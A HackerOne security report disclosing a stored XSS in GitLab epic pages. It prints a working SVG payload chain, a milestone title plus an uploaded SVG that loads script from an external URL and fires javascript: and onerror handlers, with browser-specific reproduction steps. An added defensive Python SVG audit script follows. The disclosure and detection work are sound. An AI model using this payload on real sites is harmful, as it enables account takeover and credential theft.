Stored XSS in epic's pages
HackerOne report #1055814 by mike12
on 2020-12-10, assigned to @rchan-gitlab:
Report
Hi Gitlab!
It's possible to inject arbitrary JS code into an epic's page using the Start date and Due date.
This XSS works for:
- gitlab.com using Firefox (tested in Firefox 83.0)
- A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1), Chrome (tested in Chrome 87.0.4280.88) or Firefox
Steps to reproduce using Firefox
1. Open your browser and navigate to https://gitlab.com
2. Create a group and a project in it
3. Add a file named demo.svg to the project with the following content:

   <svg id="x" xmlns="http://www.w3.org/2000/svg" width="100" height="100" >
     <foreignObject>
       <iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc='&lt;script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js&gt; &lt;/script&gt;'></iframe>
     </foreignObject>
     <image href="foo" onerror="alert('onerror')"/>
     <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">
       <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>
       <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>
     </a>
   </svg>

4. Create a new epic in the group
5. Create a new issue in the project
6. Assign the created epic to the issue
7. Create a new milestone in the project:
   - Title: <svg width="100"><use xlink:href="/<YOUR-GROUP-NAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg>
     (replace <YOUR-GROUP-NAME> and <YOUR-PROJECT> with your values)
   - Specify any valid Start Date and Due Date values
8. Assign the created milestone to the issue
9. Navigate to the epic created in step 4
10. Hover your mouse over the inherited due date
Steps to reproduce using Safari
1. Run a self-hosted GitLab instance
2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
Steps to reproduce using Chrome
1. Run a self-hosted GitLab instance
2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
3. Click the red circle in the due date tooltip.
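The chain above rests on a handful of SVG constructs: a `<use>` in the milestone title that references an external file, and foreignObject/iframe, `on*` handlers and `javascript:` links inside that file. The following audit is an added example, not code from the report or from GitLab; it uses only the Python standard library, and the sample markup (constructed, with placeholder group/project names) is modelled on the report's title and demo.svg so a reviewer can see what such a pre-render check would flag.

```python
from html.parser import HTMLParser

# Constructed samples modelled on the report's milestone title and demo.svg,
# plus a benign inline SVG that only references a local <defs> symbol.
MILESTONE_TITLE = ('<svg width="100"><use xlink:href='
                   '"/group/project/-/raw/master/demo.svg#x" /></svg>')
DEMO_SVG = ('<svg id="x" xmlns="http://www.w3.org/2000/svg"><foreignObject>'
            '<iframe srcdoc="&lt;script&gt;&lt;/script&gt;"></iframe></foreignObject>'
            '<image href="foo" onerror="alert(1)"/>'
            '<a xlink:href="javascript:alert(1)"><circle r="40"/></a></svg>')
BENIGN_SVG = ('<svg viewBox="0 0 10 10"><defs><circle id="c" r="4"/></defs>'
              '<use href="#c"/></svg>')

# Elements that embed HTML or script inside SVG and have no place in user content.
BLOCKED_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}
LINK_ATTRS = {"href", "xlink:href"}


class SvgAudit(HTMLParser):
    """Collect (kind, detail) findings for every start tag in the markup.

    HTMLParser lowercases tag and attribute names, so foreignObject arrives
    as 'foreignobject'; self-closing tags such as <image .../> also reach
    handle_starttag through the default handle_startendtag."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self.findings.append(("blocked element", tag))
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):
                self.findings.append(("event handler", f"{tag}@{name}"))
            elif name in LINK_ATTRS:
                if value.lower().startswith("javascript:"):
                    self.findings.append(("javascript: URL", f"{tag}@{name}"))
                elif tag == "use" and not value.startswith("#"):
                    # A <use> pulling in an external file is what chained the
                    # milestone title to demo.svg in the report.
                    self.findings.append(("external use reference", value))


def audit_svg(markup):
    """Return the list of findings; an empty list means nothing was flagged."""
    parser = SvgAudit()
    parser.feed(markup)
    parser.close()
    return parser.findings


def is_safe_svg(markup):
    return not audit_svg(markup)
```

A check like this belongs before the markup reaches a tooltip or any other sink that renders raw HTML; escaping the title on output (as a plain string rather than markup) removes the need for it entirely.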
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data, including credentials